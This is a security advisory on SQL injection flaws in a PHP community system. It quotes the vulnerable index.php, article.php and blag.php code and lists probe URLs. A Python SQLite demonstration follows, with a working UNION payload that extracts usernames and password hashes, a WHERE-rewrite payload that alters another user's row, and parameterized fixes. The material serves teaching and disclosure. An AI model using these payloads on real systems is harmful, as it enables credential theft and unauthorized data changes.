CR Advisory#1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
program: Seir Anphin v666 Community Management System
bug: SQL injection
home page: www.comeplaydying.com
bug found: 27.07.2006
discovered by CR www.svt.nukleon.us
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~! Details !~

============================================================================================
index.php
^^^^^^^^^

[code]
....
if (isset($HTTP_GET_VARS['styleid'])) {
    $styleid = $HTTP_GET_VARS['styleid'];
    $dbr->query("UPDATE {$dbr->p}user_options SET skin=$styleid WHERE userid=$userinfo[userid]");
.....
[/code]

The variable $styleid is taken straight from the request and interpolated into the UPDATE statement unquoted, without any filtering for dangerous characters, so SQL injection is possible. Because the injected text sits in the SET clause, in front of the WHERE, an attacker can also replace the WHERE condition and change rows belonging to other users.

[code]
.....
function loadskin($skinid) {
    GLOBAL $dbr,$data;
    $dbr->query("SELECT * FROM {$dbr->p}skins WHERE skinid=$skinid");
.....
[/code]

The variable $skinid is not filtered for dangerous characters and is interpolated unquoted, so SQL injection is possible.
============================================================================================
article.php
^^^^^^^^^^^

[code]
....
if ($this->id != 0) {
    $a['breadcrumbs'] = '';
    $catid = $this->id;
    $c = 1;
    while ($c <= getsetting('max_crumb_depth')) {
        if ($catid == 0) break;
        $dbr->query("SELECT parentid,name,accesslvl_to_read,accesslvl_to_contribute,archive_mode FROM {$dbr->p}article_categories WHERE catid=$catid");
        $cat = $dbr->getarray();
        $crumb_array[] = array('id'=>$catid, 'name'=>stripslashes($cat['name']), 'accesslvl_to_read'=>$cat['accesslvl_to_read'], 'accesslvl_to_contribute'=>$cat['accesslvl_to_contribute']);
        $catid = $cat['parentid'];
        $c++;
    }
....
[/code]

The variable $catid (initialised from $this->id) is not filtered for dangerous characters, so SQL injection is possible.

[code]
....
foreach ($HTTP_POST_VARS['orders'] as $pageid=>$displayorder) {
    // Ensure, at this level, that user has admin, editor or author permission to do this.
    $pass = FALSE;
    if (isadmin() || iseditor()) $pass = TRUE;
    $articleid = $dbr->result("SELECT articleid FROM {$dbr->p}article_pages WHERE pageid=$pageid");
    $authorid = $dbr->result("SELECT userid FROM {$dbr->p}articles WHERE articleid=$articleid");
    if ($data->vars['user']['userid'] == $authorid) $pass = TRUE;
    if ($pass) $dbr->query("UPDATE {$dbr->p}article_pages SET displayorder=$displayorder WHERE pageid=$pageid");
}
....
[/code]

The variables $pageid and $articleid are not filtered for dangerous characters, so SQL injection is possible. Note that $pageid is an array key taken directly from $HTTP_POST_VARS['orders'] and the first SELECT runs before the permission check, so an attacker does not need admin, editor or author rights to reach it; $displayorder is likewise interpolated unquoted into the UPDATE once $pass is set.
============================================================================================
blag.php
^^^^^^^^^^^

[code]
.....
if ($this->id != 0) {
    $userid = $dbr->result("SELECT userid FROM {$dbr->p}user_blogs WHERE blogid=$blogid");
    if (!isadmin() && $data->vars['user']['userid'] == $userid) {
        setstatus('access_denied');
        $this->id = $blogid;
        return $this->show();
    }
}
....
[/code]

The variable $blogid is not filtered for dangerous characters, so SQL injection is possible.

[code]
....
$dbr->query("SELECT p.blogid, b.locked, b.allow_comments, b.isprivate, b.userid FROM {$dbr->p}user_blog_posts p LEFT JOIN {$dbr->p}user_blogs b ON b.blogid=p.blogid WHERE p.postid=$postid");
....
[/code]

The variable $postid is not filtered for dangerous characters, so SQL injection is possible.
============================================================================================
example
^^^^^^^^^^^

A single quote appended to each id parameter breaks the statement's syntax and produces a database error, which is enough to confirm the injection point. Since every id is interpolated as a bare integer, a working payload does not need the quote at all.

http://www.example.com/index.php?m='
http://www.example.com/index.php?m=member&id='
http://www.example.com/index.php?m=article&id='
http://www.example.com/index.php?m=article&op=read&id='
http://www.example.com/index.php?m=blog&id='
http://www.example.com/index.php?m=blog&op=getpost&id='
============================================================================================
CR [ www.svt.nukleon.us ] 2006
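Added example, not code from the Seir Anphin product or from the original advisory: the pattern of loadskin() and of the index.php UPDATE reproduced in Python against an in-memory SQLite database, so it runs offline. The table names (skins, user_options, users, without the {$dbr->p} prefix), the sample rows and the two payloads are all constructed for this example; the real product used a different database layer. The block shows a UNION payload reading another table through the unquoted skinid, a styleid payload that rewrites the UPDATE's WHERE clause to change another user's row, and hardened versions that require an integer and bind it as a parameter.

```python
import sqlite3

# Constructed sample schema for this example. Table names mirror the ones
# quoted in the advisory (minus the {$dbr->p} prefix); the rows are made up.
SCHEMA = """
CREATE TABLE skins (skinid INTEGER PRIMARY KEY, name TEXT, css TEXT);
CREATE TABLE user_options (userid INTEGER PRIMARY KEY, skin INTEGER);
CREATE TABLE users (userid INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO skins VALUES (1, 'default', 'body{}');
INSERT INTO skins VALUES (2, 'dark', 'body{background:#000}');
INSERT INTO user_options VALUES (1, 1);
INSERT INTO user_options VALUES (7, 1);
INSERT INTO users VALUES (1, 'admin', 'hash-of-admin-pw');
INSERT INTO users VALUES (7, 'alice', 'hash-of-alice-pw');
"""


def fresh_db():
    """New in-memory database populated with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


# --- vulnerable shapes, mirroring loadskin() and the index.php UPDATE ---

def loadskin_vulnerable(conn, skinid):
    # Request value dropped into the SQL text unquoted, as in
    # "SELECT * FROM {$dbr->p}skins WHERE skinid=$skinid".
    sql = f"SELECT skinid, name, css FROM skins WHERE skinid={skinid}"
    return conn.execute(sql).fetchall()


def set_skin_vulnerable(conn, userid, styleid):
    # Mirrors "UPDATE ... SET skin=$styleid WHERE userid=$userinfo[userid]":
    # styleid is attacker-controlled and sits in front of the WHERE clause.
    conn.execute(f"UPDATE user_options SET skin={styleid} WHERE userid={userid}")
    conn.commit()
    return conn.execute("SELECT userid, skin FROM user_options ORDER BY userid").fetchall()


# --- hardened shapes: validate the type, then bind as a parameter ---

def _as_int(value):
    try:
        return int(value)
    except (TypeError, ValueError):
        raise ValueError(f"expected an integer id, got {value!r}")


def loadskin_fixed(conn, skinid):
    sid = _as_int(skinid)
    return conn.execute(
        "SELECT skinid, name, css FROM skins WHERE skinid=?", (sid,)
    ).fetchall()


def set_skin_fixed(conn, userid, styleid):
    sid, uid = _as_int(styleid), _as_int(userid)
    conn.execute("UPDATE user_options SET skin=? WHERE userid=?", (sid, uid))
    conn.commit()
    return conn.execute("SELECT userid, skin FROM user_options ORDER BY userid").fetchall()


def is_rejected(fn, *args):
    """True if the hardened function refuses the input instead of running it."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


# Constructed payloads. Neither needs stacked queries or a quote character,
# because the ids are interpolated as bare integers.
UNION_PAYLOAD = "0 UNION SELECT userid, username, password FROM users"
WHERE_REWRITE_PAYLOAD = "2 WHERE userid=1 -- "


if __name__ == "__main__":
    db = fresh_db()
    print("vulnerable loadskin:", loadskin_vulnerable(db, UNION_PAYLOAD))
    print("vulnerable update as user 7:", set_skin_vulnerable(db, 7, WHERE_REWRITE_PAYLOAD))
    db = fresh_db()
    print("fixed loadskin rejects payload:", is_rejected(loadskin_fixed, db, UNION_PAYLOAD))
    print("fixed update as user 7:", set_skin_fixed(db, 7, "2"))
```

The UNION payload returns the users rows through the skins query, and the WHERE-rewrite payload sent as user 7 changes user 1's row because the trailing "WHERE userid=7" is commented out. In the PHP 4 code base of the advisory the equivalent minimal fix is to cast before interpolating, for example $styleid = (int)$HTTP_GET_VARS['styleid'];, or to use a database layer that binds parameters. Note that neither payload relies on executing a second statement, which matters because the classic mysql_query() extension, like sqlite3's execute() here, runs only one statement per call.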